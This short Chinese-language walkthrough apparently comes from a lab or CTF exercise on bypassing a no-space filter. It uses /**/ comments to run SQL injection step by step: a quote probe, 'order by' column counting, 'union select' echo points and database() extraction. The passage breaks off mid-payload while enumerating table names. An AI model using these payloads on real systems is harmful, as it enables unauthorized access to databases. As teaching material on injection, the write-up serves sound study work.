空格绕过
初始页面是这样的:
0x00
判断是否存在注入
在name
后面加个单引号,发现页面返回异常:
判断存在注入。
0x02
常规拼接
name’ and 1=1
返回异常,显示ERROR NO SPACE
,错误无空格。想办法把空格取代掉,使用/**/
拼接语句name’/**/and/**/1=1%23
页面返回正常,说明绕过成功。
0x03
判断字段
name’/**/order/**/by/**/5%23
,页面返回正常,将5改成6则返回错误:
说明字段为5。
0x04
判断回显点
name’/**/union/**/select/**/1,2,3,4,5%23
回显点为1,2,3.
0x05
查询数据库名
name’/**/union/**/select/**/1,database(),3,4,5%23
查询到数据库名为:erercises
0x06
查询数据库中表名
name’/**/union/**/select/**/1,group_concat